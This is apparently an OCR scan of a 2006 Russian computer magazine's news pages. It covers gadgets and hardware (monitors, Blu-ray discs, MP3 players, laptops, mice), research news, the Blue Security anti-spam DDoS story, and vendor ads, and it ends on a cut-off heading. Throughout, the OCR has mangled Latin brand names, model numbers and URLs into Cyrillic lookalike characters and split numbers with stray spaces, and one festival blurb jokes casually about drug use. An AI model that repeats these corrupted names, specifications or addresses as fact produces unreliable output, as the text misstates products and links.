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Феноменальная мощность! 
Высококачественная, 
быстродействующая 
память следующего поко- 
ления НурегХ® специально 
разработана для любителей 
компьютерных игр и требовательных 
пользователей ПК. Поддерживая работо- 
способность на высоких частотах: 800, 900 и 1000 МГц, 
модули памяти НурегХ обеспечат максимальную 
производительность вашего компьютера. К тому же вы 
получаете легендарное качество Кіп^зіоп®, бесплатную 
техническую поддержку и пожизненную гарантию. 



За дополнительной информацией обратитесь на 

ѵ/ѵѵѵѵ.І<іп§$і:оп.ги. 
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НАРЮ ЫЕѴѴЗ — СЕРГЕЙ НИКИТИН 

Х-ЫЕѴѴЗ — МІМйѴѴОВК 

НІ-ТЕСН ЫЕѴѴЗ — ЮРИЙ СВИДИНЕНКО 



МЕОАЫЕѴѴЗ 




СЕНСОРНЫЙ 
ДИСПЛЕЙ СТХ 



Если тебе надоело настраивать свой монитор, постоянно тыкая 
пальцем в кнопки, расположенные обычно сбоку или снизу, а 
настройку через утилиту он не поддерживает, то присмотрись 
к новым моделям ЖК-экранов компании СТХ, которые име- 
ют сенсорное управление, существенно облегчающее процесс 
работы с ними. Ею оснащены две 17-дюймовые модели: РѴ71 1Т 
и РѴ71 1ВТ. Эти устройства снабжены пятипроводным резистив- 
ным тактильным датчиком, который отличается стабильностью 
работы и высоким сроком службы, позволяет вводить данные 
стилусом, ногтем, кредитной картой, пальцем или рукой в пер- 
чатке, а прочная вращающаяся подставка обеспечивает удобство 
работы. Технические характеристики устройства таковы: разреше- 
ние — 1280x1024, контрастность — 500: 1 , яркость — 300 кд/м2, 
соединение с ІЖчерез Э-8иЪ или И8В . Стоимость устройства — чуть 
более 600 долларов, и оно уже доступно покупателям. 
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ВІи-Кау от ТОК 

Пока проходят споры мѳгакор- 
пораций о том, какой формат 
оптических драйвов станет стан- 
дартом и чьи разработки лягут в 
его основу, компания ТОК начала 
поставлять в Россию диски Віи- 
Рау (ВР). На них можно спокойно 
записывать фильмы в сверх- 
высоком качестве Ні-ЭеІіпШоп 
(1920x1080) со звуком, счастливо 
избежавшим компрессии. В насто- 
ящий момент для приобретения 
доступны диски емкостью 25 Гб. 
Различаются они форматами: на 
ВР-Р можно только записывать 
информацию, а на ВР-РЕ есть 
возможность перезаписи. Скорость 
записи составляет 2х (72 Мб/с). 
Достигается это значение благо- 
даря применению специального 
записывающего слоя СиЗі (медь 
и кремний). Кроме того, эти диски 
обладают повышенной стой- 
костью к воздействию ультра- 
фиолета, фирменное покрытие 
□ЕІРАВІ32 спасет изделие от 
царапин и загрязнений. Кроме 
того, эти кругляшки выдерживают 
1 0 000 циклов перезаписи. 




Летняя музыка 

К летнему сезону компания Соѵѵоп 
обещает нам выпустить интерес- 
ную новинку — плеер іАибиоб, 
сердцем которого является 
микровинчестер 0,85” компании 
ТозЫЬа емкостью 4 Гб. Имея очень 
компактные размеры (76, 1x35, 6х 

19 мм, вес — 60 г), плеер обладает 
обширными возможностями. Это 
воспроизведение видео (ХѴЮ 
МРЕѲ-4), аудио (МРЗ, ѴѴМА, ОСО, 
АЗР, ПАС, ѴѴАѴ), текстовых (ТХТ) 
и графических файлов фРЕС). 
Просмотр, кстати, обеспечивает 
цветной ЖК-экран размером 1 ,3 
дюйма. К дополнительным возмож- 
ностям относятся диктофон (с пря- 
мым кодированием записи с МРЗ), 
радиотюнер и многофункциональ- 
ная сенсорная панель управления, 
которая позволяет воспроизводить 
запись, перематывать треки и 
регулировать громкость звучания. 
С компьютером устройство держит 
связь через интерфейс ІІЗВ 2.0, 
также плеер поддерживает обнов- 
ление встроенного ПО. Кстати, 
заявленное время работы от одной 
зарядки аккумулятора составляет 

20 ч. Появление на прилавках 
ожидается в июне. 
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Новый уровень БЕЗОПАСНОСТИ 

\л/\л/ѵѵ.тісго5(Лсот /ш$ /зесигііу 



МОМЕНТАЛЬНЫЕ УВЕДОМЛЕНИЯ: 

► Уведомления о критических обновлениях. Информация 
о готовящихся к выходу пакетах обновлений и рекомендаций 
кним. 

► Ежемесячные новости по безопасности. Информация 
о последних обновлениях по безопасности, инструкции, 
события / теперь на русском языке! 

► Веб-трансляции и рекомендации. При решении задач 
воспользуйтесь онлайновыми семинарами (веб-трансляции) 
и экспертными советами. 

СПЕЦИАЛЬНЫЕ ПРЕДЛОЖЕНИЯ: 

► Для организаций от 100 до 500 ПК. С 15 апреля по 15 июня 
2006 года получите индивидуальный План по повышению 
уровня безопасности вашей информационной системы. 

Узнайте больше и оставьте заявку на сайте: 
ѵѵѵѵѵѵ.тісгозоЛ.сот /ш5 /$есигі1усИеск 

► Для организаций от 500 ПК и больше. С 15 апреля 2006 года 
закажите Стратегический брифинг по информационной 
безопасности для вашей организации. Узнайте больше 

и оставьте заявку на сайте: ѵ\ллл/ѵ.тісго5оЛ.сот/ги5/о^ег/ 

► Місго$о^і Бесигііу Рау. В рамках конгресса ІпІегОр, 22 июня 
2006 года. Зарегистрируйтесь: ѵѵѵѵѵѵ.іпіегор.ги (участие бесплатное). 



© 2006 МісгобоШ Согрогаііоп. Все права защищены. Владельцем товарных знаков МісгобоЛ, 
АпГідеп и ѴѴіпсіоѵѵб Бегѵег, зарегистрированных на территории США и/или других стран, 
и владельцем авторских прав на их дизайн является корпорация МісгобоШ. 



ИНСТРУМЕНТЫ И ОБНОВЛЕНИЯ: 

► МісгобоЛ Бесигйу АзБеБзтеп* ТооІ (М5АТ) - средство для 
оценки рисков, связанных с безопасностью, и учитывающее 
процедуры по работе с персоналом, процессы и технологии, 
используемые в организации/ теперь на русском языке! 

► МісгозоН Вазеііпе 5есигйу Апаіузег (МВ5А) - инструмент, 
способный проанализировать операционную систему 

и приложения на наличие стандартных ошибок настройки 
системы безопасности, уязвимостей. 

► Маіісіоиз 5о^ѵѵаге КетоѵаІ ТооІ - инструмент удаления 
наиболее распространенных видов вредоносных программ 
с компьютеров под управлением ѴѴіпсіоѵѵб . 

► Обновления. Усовершенствуйте свою систему защиты 

с помощью набора автоматизированных инструментов - 
таких, как ѴѴіпсіоѵѵб Бегѵег™ Іірсіаіе Зегѵісез (ѴѴ51І5). 

АІЧТІѴІКЦ5 РОК ЕХСНАМСЗЕ: 

Загрузите демонстрационную версию Апіідеп® Іюг Ехсііапде 
и снабдите ваш сервер мощной системой защиты от вирусов, 
червей, спама и информации ненадлежащего содержания. 



МісгозоП 








Мощный ноутбук уже давно не является чем-то мифическим. 
Сегодня компания М8І представляет олицетворение мобиль- 
ной мощи — устройство 8271, оснащенное процессором А1ѴГО 
Тигіоп 64 Х2 Оиаі Соге. Кроме этого, он имеет 12-дюймовый 
экран (1280x800 пикселей с соотношением сторон 16:10), 
графический чип АТІ Касіеоп Хрге88200, поставляется с 512 
или 1024 Мб ОЗУ, а также с жестким диском объемом до 120 Гб 
(скорость вращения шпинделя 5400 об/мин). Нельзя не от- 
метить наличие таких беспроводных интерфейсов, как ДУі-Бі 
Ъ\§ и ВІиеТооіЬ 2.0. Ноутбук оснащен сенсорным манипу- 
лятором курсора ВиТТегПу ТоисЬраф повышающим удобство 
работы, а также технологиями динамического разгона ЦП и 
ГП и системой энергосбережения. А меломаны оценят аудио- 
систему объемного звучания, которой снабжен 8271. Корпус 
устройства создан из алюминиево- магниевого сплава, имеет 
толщину 2 см, а весит 2 кг. 





А81І8 подгоняет физику 

Чтобы разгрузить центральный 
процессор и придать играм 
новые возможности, компания 
АЗІІЗ выпустила плату РИузХ Р1 , 
оснащенную чипом Адеіа РИузХ, 
который является физическим 
ускорителем: с его помощью в 
играх мы увидим реалистичное 
изображение взрывов, правиль- 
ный, соответствующий всем 
законам физики полет обломков 
от них, настоящее течение воды, 
натуральное столкновение 
твердых тел, а также то, как 
ветер разрывает густую пелену 
дыма или тумана. Центральный 
же процессор освобождается 
для обработки искусственного 
интеллекта и игровой логики. В 
общем, красота! Плата работает 
со 1 28 Мб памяти СЮОП-3, ширина 
ее шины составляет 1 28 бит, а 
частота — 733 МГ ц. Стоит отме- 
тить, что эти платы уже появились 
в продаже. Игры, рассчитанные 
на работу с ними, уже находятся 
в разработке. Отметим также тот 
интересный факт, что компания 
ІМѴЮІА готовит к выходу на рынок 
похожее решение. 




Внедорожная мышь ЬодііесИ 

Джип отличается от обычной 
машины своей надежностью, 
мощностью и проходимостью, 
а комфорт передвижения часто 
остается на втором месте. Если 
проводить аналогии, то новая 
мышь от компании І_одіІесІз 
похожа на очень дорогой внедо- 
рожник: она работает в любых 
условиях, при этом имея высокую 
эргономику, являясь, таким об- 
разом, превосходным решением 
для мобильных пользователей. 
Технология двойного лазерного 
отслеживания позволяет мыши 
работать практически на любых 
поверхностях. Корпус устройства 
защищен отударов, а ресивер, 
подключающийся к порту ІІЗВ 
(мышь беспроводная, работает на 
частоте 2,4 ГГц и на расстоянии до 
9 м от компьютера), во избежание 
потери можно упрятать внутрь 
корпуса. Устройство оснащено 
колесиком прокрутки І_одіІесИ 
ТіІіѴѴИееІ Р1из2оот, которое 
позволяет пользователям легко 
и просто прокручивать экран 
сверху вниз и слева направо, а 
также увеличивать и уменьшать 
масштаб при просмотре цифро- 
вых фотографий, ѴѴеЬ-страниц 
и документов. Кроме того, мышь 
работает от одной батарейки АА 
и имеет на корпусе индикатор 
ее заряда. Мышь доступна для 
приобретения по цене менее 100 
долларов. 




Как ты смотришь на то, чтобы твоя звуковая система была выдающейся во всех 
смыслах этого слова? То есть качественный звук — это само собой разумеюще- 
еся, но хотелось бы еще чего-нибудь эдакого. Модель АѴЕ В 100 (система 2.0) 
как раз для тебя. Хотя бы потому, что высота колонок составляет полметра, 
а ВМ8-мощность — 80 Вт. Кроме того, в этих гигантах вольготно размес- 
тились 8 -дюймовые басовые динамики. В комплект поставки входит пульт 
дистанционного управления, на одной из колонок находится блок управления 
с небольшим ЖК- экраном, регулятором громкости звука, баса и тона, а также 
разъемами для подключения двух микрофонов (для фанатов караоке). Кроме 
того, колонки имеют провода для подключения не только к компьютеру, но и к 
В ѴЕ) -плееру, и телевизору. Размер устройств составляет 49x20x30 см, а гаран- 
тия на них — 1 год. Цена комплекта составляет около четырех тысяч рублей. 



Новый кулон ІВІѴЕК 

На российский рынок поступила новинка от компании ІРІѴЕР — плеѳр-кулон N12. 

К нему прилагаются специально разработанные наушники, соответствующие 
имиджевой направленности устройства: без удлиненных проводов, выполненные в 
виде замкнутого круга, как бусы или колье, на которые крепится кулон. Стильность 
устройства подкрепляется одноцветным полузеркальным ОІ_ЕО-экраном с 1 6-ю 
оттенками, кристаллом Зѵѵагоѵзкі в корпусе черного цвета и оригинальным «скрин- 
сейвером» с фирменным танцующим человечком. Впрочем, функциональность 
плеера от этого нисколько не пострадала: 1 Г б памяти (старшая модель), работа 
с форматами МРЗ, ѴѴМА, АЗЕ и 00(3 ѴогЬіз, эквалайзер, система 30-звучания, 
соотношение сигнал/шум — 90 дБ, максимальная выходная мощность — 1 4 мВт на 
канал . Дополнительно плеер оснащен часами с будильником и таймером, радиотюнером и 
диктофоном. Размеры плеера составляют 27,2x48,8x1 3,3 мм, вес с аккумулятором — 23 г, а 
время работы — 13 ч. Девайс имеется в магазинах по цене 200 долларов. 
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сотриіег 



АМЭЛ 

СДЕЛАЙТЕ РАЗУМНЫЙ 

ВЫБОР 




Ваш новый виртуальный дом 
ждет Вас! 



ѵѵѵѵѵѵ.пі.ги 



Процессор АМй АіЫоп™ 64 - передовая производительность для игр, видео и музыки 

Надежные компьютеры для любых задач. 

Модельный ряд на все запросы и возможности. 3 года гарантии. 

Компьютеры марки <[\ІТ> на базе процессора АМД АШоп ™64 спрашивайте в магазинах 
Федеральной сети компьютерных центров РОІ_АКІ5. 

Оптовые поставки (495) 970 1 930. Сеть региональных филиалов. 

ѵѵѵѵѵѵ.атсі.ги 



АМО 




АіЫоп 



© 2006 Асіѵапсесі Місго Оеѵісез, Іпс. Все права защищены. АМР, логотип стрелка АМР, АМРТигіоп и любые комбинации логотипов являются зарегистрированными торговыми марками АсІѵапсесІ Місго Оеѵісез, Іпс. 










ВОТТАК КОЛЯСОЧКА... 



Кресло для танкистов 

Если ты в детстве хотел быть танкистом, то кресло Тапк СЬаіг как раз для тебя! 

Г ениальная и простая идея — приделать настоящие танковые гусеницы к обычному 
креслу. Это реализовал один Кулибин из США и получил универсальный девайс как 
для любителей покататься, так и для инвалидов. На этом монстре можно путешест- 
вовать через грязь, снег, песок, преодолевать небольшие овраги и даже спускаться 
и подниматься по лестницам ! Выдерживает это чудо тело весом 1 20 килограммов. 
Сделано и продано уже около 1 0-ти таких машин. После этого Кулибин основал 
компанию ТапкСЬаіг, которая и занимается дальнейшим распространением кресел- 
танков. 

Моторы, приводящие кресло в движение, взяты от боевых роботов, выпускаемых 
компанией І\ІРС гоЬоіісз. Танк-кресло можно заказать на специальной веб-стра- 
ничке ( ѵѵѵѵѵѵ.ІапксЬаіг.сот У Как говорит сам Кулибин, он подарил одно кресло 
реабилитационной больнице для парализованных, после чего там организовалась 
постоянная очередь желающих покататься. Да, думаю, ты и сам был бы не прочь :). 
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Забудь про обычные электрошокеры! Сейчас модна другая фишка — нож, 
который больно стреляет током. И предлагает это удовольствие канадская 
компания ЗЬоскпіГе всего за $444. ЗЬоскпіГе выглядит, как нож, и весит при- 
мерно также, но не может нанести серьезной травмы. Притом что длина его 
лезвия — 28 сантиметров . От прочих ножей для тренировки навыков рукопаш- 
ного боя его отличает одно важное новшество: весь край «лезвия» (и сверху, 
и снизу) у 8ЕоскпіГе представляет собой сплошной электрошокер, способный 
при контакте выдать разряд в 7,5 тысяч вольт (на рукоятке есть кнопка актива- 
ции). Авторы разработки полагают, что шоковый нож намного эффективнее 
в тренировках по рукопашному бою, чем обычные в таких случаях деревянные 
или резиновые ножи, так как при пропуске удара ЗЬоскпіГе вызывает у оборо- 
няющегося сильную боль, заставляя его действительно стараться. Кроме того, 
этот нож четко «локализует» точку удара, позволяя анализировать свои ошибки 
в технике боя. Еще он позволяет тренирующемуся чувствовать даже небольшие 
«порезы». Чтобы тебя или твоего друга случайно не зашибло от электроразря- 
да, на ноже есть специальный регулятор мощности на 4 положения. В принци- 
пе, электронож может применяться и как оружие самообороны, но, в первую 
очередь, канадцы рассчитывают на внимание полиции и армии, спецію дразде- 
лений и клубов единоборств, так как считают ЗЬоскпіГе идеальным тренировоч- 
ным инструментом. 




ВОТ ОНА КАКАЯ — 
ПОДРУГА БУДУЩЕГО 



Корейская киберподруга 

Ты, может, уже слышал о разных киберподелках на тему 
замены прекрасной половины человечества. Так вот, на на- 
шей планете появилась вторая женщина-андроид. Первую 
представили японцы в 2003-м году. Вторая же киберподру- 
га — собственная разработка Южнокорейского института 
индустриальных технологий (Когеа Іпзіііиіе оі Іпбизігіаі 
ТесЬпоІоду — КІТЕСН). Второй в мире андроид получил имя 
ЕѵеР-1 . Первая половина названия — это имя Ева (Еѵе), 
а буковка «В» позаимствована у слова «гоЬоК Подруга 
обошлась создателям в 3000 долларов. Она успешно при- 
кидывается 20-летней кореянкой в натуральную величину: 
ее рост — 1,6 метра, а вес — около 50-ти килограммов. 
Только есть один нюанс: девушка-андроид не может пе- 
редвигаться, так как ее нижняя часть туловища прикована 
к креслу. Зато она может двигать верхней половиной 
тела и руками, демонстрировать четыре выражения лица 
(радость, гнев, горе и счастье) с помощью 1 5-ти крошечных 
двигателей, «понимать» 400 слов, устанавливать контакт 
«глаза в глаза» и, наверное, что-то еще. К концу этого года 
КІТЕСН обещает показать ЕѵеР-2, которая будет способна 
стоять и вообще являть собой более совершенную версию 
в плане «зрения» и выражения эмоций. Ожидается, что 
машины вроде ЕѵеР смогут служить гидами, выдавая 
информацию в универмагах и музеях, а также развлекать 
детишек. 




Видео на ходу 

Хочешь идти по улице и смотреть новый фильм? Это теперь 
возможно с новым кибердисплеем от Коріп. Г аджет, 
называемый Коріп СуЬегМап (ЗѴЭ510-ЗЭ, способен вос- 
производить перед твоими глазами высококачественное 
трехмерное изображение на виртуальном 40-дюймовом 
экране, который как бы расположен на двухметровом 
расстоянии от глаз. Основа гаджета — цветные 0,44-дюй- 
мовые микродисплеи Коріп СуЬегЭізрІау. Ранее они исполь- 
зовались только в военных системах визуализации данных. 
Кибердисплей характеризуется ѴСА-разрешением 640 х 480 
пикселей, низким энергопотреблением и способностью 
отображать 16,7 млн. цветов. При этом Коріп СуЬегМап 
СѴЭ51 0-ЗЭ имеет совместимость с платформой ѴѴіпсІоѵѵз, 
а также может использоваться с игровыми консолями 
МісгозоЙ ХЬох (включая ХЬох 360) и Зопу РІауЗіаІіоп 2. 
СуЬегЭізрІау характеризуется высокой плотностью пиксе- 
лей на квадратный дюйм, что позволило создать устройство 
с большим графическим разрешением. Дисплей имеет низ- 
кую стоимость (в пределах $300, в зависимости от модели), 
что делает видеоочки доступными среднему геймеру. 
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Тариф для абонентов 65М с предоплатной системой расчетов. Скидка действует в течение суток после 5 мин. (7 или 10 мин. - в зависимости от региона) платных исходящих вызовов для абонентов, не находящихся в роуминге, и распространяется на местные исходящие вызовы. 
Подробнее условия предоставления скидки - в офисах продаж Вашего региона и на сайте ѵѵѵш.ЪееІіпе.ги . Оборудование сертифицировано. Лицензии Госкомсвязи РФ, Минсвязи РФ и Россвязьнадзора №№ 32861, 39769, 39770, 39771, 31106, 31107, 31108, 

31109, 31110, 31111, 31112, 31113, 31114, 31115, 31116, 35651, 35652, 35653, 35654, 21719, 33163, 19532, 28751, 28884, 6038, 15001, 14481, 15130, 33724, 33725, 28206, 5331, 35625, 35624, 12050, 20385, 20732, 20733, 22671, 34540, 19752 




Наслаждайся свободой общения 
с 90% скидкой после нескольких минут 

разговоров в день* 

Тариф «Хочу сказать» 

Подробности © 0606 




Билайн" 



живи на яркой стороне 





Ноут — вещь всегда нужная, только на него не всегда можно выделить кругленькую сумму. Представь 
себе, что чувствуют китайцы или индусы, у которых денег еще меньше, чем у нас? А им тоже работать 
надо! Для таких вот целей компания Іптеі наконец-то официально презентовала недорогой ноутбук 
для развивающихся стран. Доступность в понимании ІгЦеІ — это $400, за которые потребитель полу- 
чит пусть не очень мощный, но совершенно полнофункциональный ноутбук. Новый ноутбук носит 
кодовое имя Ескгѵѵізе. Подробностей известно немного: операционная система — ТѴіпсіот или 
Ііпих, выход в Интернет через канал \Ѵі-Рі. Корпус-сумка с ручкой и застежкой-кнопкой, по замыслу 
Іпііеі, должны понравиться преподавателям и студентам. Ведь именно для развития образования 
новинка и предназначена. Новый ноут добавляет остроты в борьбу компаний за массовую компью- 
теризацию стран третьего мира. Только недавно исполнительный директор Іптеі Крэйг Барретт рас- 
критиковал проект ноутбука за $100 Николаса Негропонте из медиа- лаборатории Массачусетского 
технологического института (МІТ Месііа ЬаЬ). А свои 5 копеек в видении доступного компьютера 
для развивающихся стран предложил даже дядюшка Билли. Дешевый ноут Есішѵізе, как обещает Іпііеі, 
можно будет купить уже в следующем году. 

Новый ультратонкий 
мобильник от 8ат5ілпд 

Казалось бы, как можно делать телефоны еще меньше 
и при этом оснащать их новыми функциями? Наверное, 
компания Затзипд это знает хорошо, так как на недавно 
прошедшей московской выставке «Связь-Экспокомм 
2006» она представила самый тонкий в мире мобильный те- 
лефон — ЗОН-Х820. Толщина корпуса новинки составляет 
всего 6,9 миллиметра. Другие параметры: длина — 1 1 3 мил- 
лиметров, ширина — 50 миллиметров, вес — 66 граммов. 

Кстати, низкий вес, среди прочего, обеспечивается за счет 
прочного корпуса из пластмассы со стекловолоконным 
наполнителем. Несмотря на столь скромные габариты и 
малый вес, телефон хорошо оснащен. В частности, здесь 
есть 2-мегапиксельная фотокамера, с возможностью запи- 
си видео в стандартах МРЕО-4 и Н.263. Неудивительно, что 
встроенная память телефона довольно велика и состав- 
ляет 80 мегабайт. Дисплей — 1 ,9 дюйма, 1 76 х 220 точек, 

262 тысячи цветов. Телефон понимает файлы МРЗ, ААС, 

АСС+, ААС+(е) и ѴѴМА, может просматривать документы 
и обладает интерфейсами ВІиеІооФ, ІІЗВ и РісІВгібде. А 
также ЗОН-Х820 имеет видеовыход. Не брезгует мобила и 
Интернетом (ОРРЗ). Как говорят специалисты компании, 
плотная упаковка элементов телефона — заслуга новой 
технологии монтажа «Умная поверхность» (ЗтаііЗиіТасе 
Моипйпд ТесНпоІоду — ЗЗМТ). Все хорошо, только одно 
пугает — возможная цена, которая еще не объявлена. 





Массив нанотрубок действительно 
напоминает «липучку» 

Оказывается, обычные термопасты передают 
тепло от камня к радиатору не так хорошо, 
какхотелосьбы инженерам, разрабатываю- 
щим новое поколение процессоров. Поэтому 
термопасте начали искать замену. И вот, 
как недавно установили ученые, углерод- 
ные нанотрубки могут стать эффективным 
передатчиком и даже рассеивателем тепла. 
Так, Тимоти Фишер (ТітоФу 3. РізИег) и его 
коллеги из университета Пардью (Ригбие 
Ііпіѵегзііу) смогли покрыть ковром из нанотру- 
бок поверхность рассеивающего радиатора, 
увеличив скорость передачи тепла между ним 
и охлаждающей поверхностью. Получившийся 
наноковер из углеродных нанотрубок имел 
сходство с обычной застежкой-липучкой, 
поэтому исследователи назвали его ТНегтаІ 
Ѵеісго. Первоначальная цель исследователей 
состояла в разработке новых типов тепловых 
интерфейсов, обеспечивающих более быст- 
рую передачу тепла от микросхем к охлаждаю- 
щему радиатору. Тимоти и его команда назвали 
новый материал «застежкой» (Ѵеісго), потому 
что сначала чип и радиатор покрывают тонким 
ковром из нанотрубок, а затем соединяют обе 
части так, как если бы вы застегивали застеж- 
ку-липучку. Естественно, такой термоинтер- 
фейс не обеспечивает механической адгезии 
двух поверхностей, но из-за контактирования 
нанотрубок между собой он является хорошим 
передатчиком тепла. Как установили ученые, 
чипы нагреваются не только изнутри, но и в 
местах контакта с термопастой, которая не 
успевает полностью передать тепло радиа- 
тору. Так, при использовании традиционных 
термоинтерфейсов чип на поверхности допол- 
нительно нагревается на 1 5° С, а «липучка» из 
нанотрубок вызывает дополнительный нагрев 
микропроцессора всего на 5° С. Поскольку 
в будущем размеры чипов уменьшатся и, 
соответственно, их нагрев увеличится, то даже 
несколько градусов будут важны для работос- 
пособности устройства. Технология термоин- 
терфейса уже подготовлена к коммерческому 
распространению, и компании, участвовавшие 
в исследовании, намерены вскоре показать на 
основе ТНегтаІ Ѵеісго серийную продукцию. 
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А МУШКА-ТО НЕПРОСТАЯ... 



Кибершмель, питающийся радиоволнами 

Практически все воздушное пространство вокруг нас заполнено 
радиоволнами. А если попробовать как-то использовать эту даровую 
энергию, за которую платят теле- и радиопередающие станции? Такую 
идею выдвинула гавайская компания АтЬіепІ Місго в сотрудничестве с 
гавайским отделением компании Тгех Епіегргізез. И не просто выдвину- 
ла, а начала активно воплощать в жизнь. Она работает над крошечными 
магнитными антеннами и другими узлами, которые преобразовывают 
в постоянный ток пробегающие мимо низкочастотные радиосигналы 
от радио- или телевизионных станций. На этом принципе работают 
обычные детекторные приемники , так что энергии хватает на то, чтобы 
услышать звук в наушниках. Но хитрые гавайцы пошли дальше: почему 
бы не сделать сверхлегкий девайс с малым потреблением электро- 
энергии, который бы летал и высматривал все вокруг, получая питание 
как раз из телерадиоэфира? К июню 2006-го года компания намерена 
представить первый небольшой модуль М8-АМРЗ (МиШ-Зоигсе АтЬіепІ 
РоѵѵегЗиррІу — блокпитания с множественным окружающим источни- 
ком энергии), который должен оказаться способным заменить литие- 
вую батарейку в маломощной аппаратуре. На днях компания АтЬіепІ 
Мг г о получила от американских ВВС (ІІ5АР) $1 00-тысячный контракт 
на развитие такой системы питания датчиков для маленьких беспилот- 
ных разведчиков (размером с муху или шмеля). А ранее из ряда других 
государственных источников — почти $400 тысяч на проработку всей 
этой технологии и создание действующих прототипов. Так что увидишь 
такого шмеля — бей его сразу! 





300 тысяч лет с іРосГом 

Если ты засунешь любимый іРосІ в воду, то, скорее всего, ничего 
хорошего из этого не выйдет. Однако надо уметь засовывать в девайсы 
воду, чтобы получить что-то толковое. «Замочить» компьютерные чипы 
удалось группе ученых из университета Пенсильвании, университета 
Дрексела и Г арвардского университета. Как они установили, именно 
вода может стать одним из компонентов сверхъемкой компьютерной па- 
мяти. Так, им случайно удалось обнаружить изменение электродинами- 
ки нанострун при попадании их отдельных фрагментов в водную среду. 
Наноструны из ферроэлектриков имеют диаметр всего-навсего в не- 
сколько атомов. Но это не мешает им быть отличными хранителями инфор- 
мации. На отдельных отрезках ферроэлектриков формируются диполи, 
которые и являются битами. Однако диполи возникают на нанострунах 
спонтанно, и нельзя, например, записать информацию на нанонить и затем 
ее считать — настолько дипольные структуры нестабильны. И в этом слу- 
чаеученым случайно удалось обнаружить естественный «стабилизатор», 
который не дает случайным образом пропадать записанной информации. 
Им оказалась обычная вода, в которую ученые случайно поместили части 
нанострун. Ученые подсчитали плотность хранения информации в «вод- 
ной» памяти на основе ферроэлектрических нанонитей. Согласно их рас- 
четам, в кубическом сантиметре можно будет хранить до 100 000 терабит! 
Вот если такую память запихать в ІРосІ, то можно хранить до трехсоттысяч 
лет (!) непрерывного звучания музыки, записанной в МРЗ-формате. А если 
весь объем ОѴО-диска заменить несоответствующий объем нанопамяти, 
то его емкость составит до десяти тысяч лет просмотра видеофильмов в 
высоком качестве. 

Студенты сделали дешевый и удобный 
марсианский скафандр 

Если нужно сделать что-то дешево и сердито, всегда вспоминают о 
студентах. То же самое произошло, когда потребовался недорогой 
и работоспособный марсианский скафандр. Американское косми- 
ческое агентство (ІМАЗА) предоставило грант в размере $1 00 тысяч 
консорциуму космических грантов Северной Дакоты (ІМогіИ Оакоіа 
Зрасе (Згапі Сопзогііиіл) для осуществления проекта «Планетарный 
скафандр» (Ріапеіагу Зрасе Зиіі). Всего через год работы его постро- 
или примерно 40 студентов из пяти вузов Северной Дакоты во главе с 
представителями университета штата (Ііпіѵегзііу оі ІМогіИ Оакоіа). По- 
лученный скафандр оказался очень легким и гибким — его вес на Зем- 
ле составляет всего 21 ,3 килограмма. Полевые тесты на местности, 
напоминающей марсианскую, показали, что человек в новом скафан- 
дре может спокойно садиться на корточки, поднимать с земли камни 
и очищать их от пыли, работать разными геологическими инструмен- 
тами, вести «марсоход», легко наживлять на болт гайку и закручивать 
ее пальцами. Более того, гибкость перчаток скафандра настолько 
велика, что астронавт сможет запросто воспользоваться шариковой 
ручкой, оставляя в блокноте записи совершенно не отличимые от тех, 
что может сделать человек без перчаток. С помощью двух человек но- 
вый скафандр надевается за 20 минут, что очень и очень неплохо. Все 
материалы и герметичные сочленения нового костюма рассчитаны на 
работу с большим перепадом давления (снаружи и внутри), а также 
на длительное сопротивление разрушающему действию марсианс- 
кой пыли. В костюме предусмотрены мощные слои теплоизоляции и 
система терморегулирования. Ранец новинки рассчитан на быструю 
«горячую» замену расходных материалов (порядка 5-ти минут). Вот 
такие уникальные вещи делают студенты, если им дать денег! 
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ОКО ЗА ОКО I 



Со спамерами нынче шутки плохи. Приме- 
ром стал случай, который произошел с Віие 
Зесигііу — американской фирмой, специ- 
ализирующейся на компьютерной безопас- 
ности. Недавно парни из В 8 придумали 
способ, который, по их словам, способен 
положить конец спамерскому злу. 

Имя ему — Віие Бго§. На самом деле это 
простенькая программа, которая ищет в 
мыле юзера спамовые сообщения, находит і/ ( ^ ^ 
них ссылки на рекламируемые сайты и затеке / *** 

отсылает от имени юзера жалобы владель- С * ^ ^ р ^ ^ 

цам этих ресурсов. Получив очередную 
тысячу таких жалоб, клиенты спамеров сто 
раз подумают перед тем, как обратиться к 
ним за помощью снова. Віие 8есигііу решила 
продемонстрировать эффективность своей 
проги наглядно и разослала кучу мессаг 
представителям спам-сообщества. Стоит ли 
говорить, что тем такой подход не понра- 
вился, и ответа не пришлось долго ждать. 

Спамерская мафия натравила на В8 десятки 
тысяч компьютеров-зомби, заддосив бедную 
фирму по самые помидоры. Сайт загнулся. 

Помимо этого, спамеры прислали на емейл 
фирмы предложение немного поумерить 
пыл, иначе следующими окажутся клиенты 
Віие 8есигііу. Отправка жалоб на спамерс- 
кие адреса была остановлена, но так просто 
«безопасники» это оставлять не стали и 
обратились к ФБР. Сейчас идет разбор по- 
летов, но я, честно говоря, сомневаюсь, что 
федералы тут помогут. 



Косіак спамит 
своих клиентов 

Ни для кого нѳ секрет, что многие 
крупные компании занимаются спамерс- 
кой деятельностью. Недавно стало 
известно, что одной из таких фирм явля- 
ется Косіак, которая полтора года назад 
разослала 2 миллиона нежелательных 
сообщений посетителям своего сайта. 
На компанию подали коллективный иск 
в суд. Дело это продвигалось достаточ- 
но медленно, и закончилось признанием 
Кобак’ом своей вины, с готовностью 
выплатить штраф размером в 26 тысяч 
долларов. По словам представителей 
компании, произошло все в результате 
технического сбоя. Проблема теперь 
исправлена, и инцидент больше не 
повторится. Что за сбой, правда, в 
Кобак’е не уточнили. В США сейчас 
к коммерческому спаму относятся 
особенно строго: в сообщении должна 
быть пометка о рекламном характере 
письма, обратный адрес и возможность 
отписаться от рассылки. 







ААѴегТѴ Сігййиі РІив 
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Республика Кагантип 

Меня надо очень долго бить по голове чугунной чуш- 
кой, чтобы я смог забыть, что 1 5 июля в очередной раз 
начнется самый крутой опенэйр, который только можно 
представить - Казантип. Раскинвушись на берегах Евпа- 
тории, республика ежегодно собирает по 50000 любите- 
лей электронной музыки и просто тусовки и наркотиков :). 
Помимо Елочных игрушек, 2Н Сотрапу, Фонаря и кучи 
других мэтров их там будут ждать: 3 школы кайтсерфинга, 
бары, кафе, чилауты, самые разные танцполы и, конечно, 
офигенный песочный пляж. Я уже предвкушаю, как мы 
всей редакией отправимся на Казан, где будем отжигать 
по полной, валяться на пляже, загорать, купаться, играть в 
баскетбол и волейбол, и... ну, ты меня понял :). Г отов спо- 
рить, что на Казантипе наверняка можно будет встретить 
окуренного и уволенного Бублика, обдолбанного Кутту, 
трезвого, но довольного жизнью Никитоса, Олега N30 
с бейсбольной битой, Колю Г орлума в ластах и других 
представителей тусовки Ха. 





Банкоматный триллер 

